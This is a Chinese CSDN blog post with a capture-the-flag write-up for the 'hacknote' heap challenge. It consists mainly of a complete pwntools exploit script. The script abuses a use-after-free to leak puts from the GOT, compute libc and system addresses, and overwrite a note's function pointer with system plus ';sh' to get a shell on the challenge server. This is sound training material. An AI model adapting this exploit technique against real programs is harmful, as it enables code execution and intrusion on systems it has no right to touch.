hacknote 攻防世界

最新推荐文章于 2023-05-06 15:15:21 发布
最新推荐文章于 2023-05-06 15:15:21 发布
阅读量485 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90318507
版权

这个题我以前做过 只不过这次没有了后门函数  下面这个链接是我以前做的题的链接

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/

有了上次的经验 这次做的还比较顺利

思路其实差不多的

from pwn import*
io=remote("111.198.29.45",52641)
#io=process("./hacknote")
elf=ELF("./hacknote")
libc=ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
#context.log_level="debug"
print_addr=0x0804862B
#get_addr=elf.symbols['magic']
def add(size,content):
	io.recvuntil("Your choice :")
	io.sendline("1")
	io.recvuntil("Note size :")
	io.sendline(str(size))
	io.recvuntil("Content :")
	io.sendline(content)
 
def dele(index):
	io.recvuntil("Your choice :")
	io.sendline("2")
	io.recvuntil("Index :")
	io.sendline(str(index))
 
def show(index):
	io.recvuntil("Your choice :")
	io.sendline("3")
	io.recvuntil("Index :")
	io.sendline(str(index))
 
if __name__ == '__main__':
	add(0x20,'aaaa')
	add(0x20,'bbbb')
	dele(0)
	dele(1)
	payload=p32(print_addr)+p32(elf.got['puts'])
	add(8,payload)
	show(0)
	puts_addr=u32(io.recv()[:4])
	libc_base_addr=puts_addr-libc.sym['puts']
	system_addr=libc_base_addr+libc.sym['system']
	log.success("puts_addr"+hex(puts_addr))
	log.success("libc_base_addr"+hex(libc_base_addr))
	log.success("system_addr"+hex(system_addr))
	dele(2)
	#sh_addr=libc_base_addr+libc.search("/bin/sh").next()
	payload=p32(system_addr)+";sh\x00"
	add(8,payload)
	show(0)
	io.interactive()
	io.close()

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf hacknote
qq_65147345的博客
07-17 799
程序有uaf漏洞,可以通过uaf漏洞更改输出函数为........
攻防世界 —— hacknote
qq_41696518的博客
07-19 1429
攻防世界——hacknote
Hacknote 一道简单的UAF漏洞题
红叶的博客
03-09 307
看了大佬们的WP两天,勉强搞懂了原理。如有任何错误请在评论区指出。
【PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 367
回顾经典老题。一、
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
攻防世界encode杂项
11-20
攻防世界encode杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947807
hack必通关系列.zip
11-25
有hacknet有hackthegame有uplink 几款经典的黑客游戏,入坑安全之路 话不多说直接安排
pwnable_hacknote_WP
weixin_56434818的博客
03-01 723
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
hacknote
m0_48127441的博客
04-23 123
0x0804A050 指针数组 32位 1.alloc malloc(0x8) == >chunk(0x10) struct note {函数地址,内容指针} malloc(size) 2.del free(note.内容指针) free(note) 3.print s[idx](s[idx]) 4.exit free(fas...
攻防世界)(pwn)hacknote
PLpa的博客
07-31 2250
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
hacknote--PWN的堆入门
Jason_ZhouYetao的博客
02-24 1197
第一步还是进行逆向的功能分析,顺便观察有无敏感函数,诸如:/bin/sh、cat flag等等   看了看发现还真的有,那这个题目就大大得简化了,接下来进行进一步的逆向分析:   add_note: unsigned int add_note() { _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int siz...
hacknote 记录
weixin_55190422的博客
11-27 329
做了这么久的Pwn终于遇到堆的题目了。 而此处就有一个漏洞——UAF漏洞,即释放之后并没有清空指针,则仍然可以调用其他的相关函数。 也就是,实际上调用了控制chunk可用部分的前4个字节的函数指针所指向的函数,参数为控制chunk可用部分地址。 那么,如果我们可以修改控制chunk中可用部分的前4个字节所指向的位置,修改为system,并在后四个字节中添加上 ||sh (这里一开始没想到,注意为了执行shell命令,可以的一些方法 sh# 或者 ||sh ,前一个可以注释掉后面的...
攻防世界PWN之Hacknote题解
seaaseesa的博客
11-09 1363
Hacknote 首先,查看程序的保护机制 然后拖入IDA分析 这是创建堆,并写入信息。 经过分析,大概是这样的 typedefstructNote{ void*func;//函数指针 char*buf;//内容指针 }Note; //保存Node的指针数组 Note*notes[5]; int...
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 557
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
2019 湖湘杯 HackNote 经验总结
qq_43189757的博客
11-11 910
静态链接的题目, 又学到了一点 程序保护: 保护全关 程序逻辑分析: 通过观察start 的汇编代码找到main函数的地址 箭头
攻防世界 easyphp
最新发布
09-11
在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值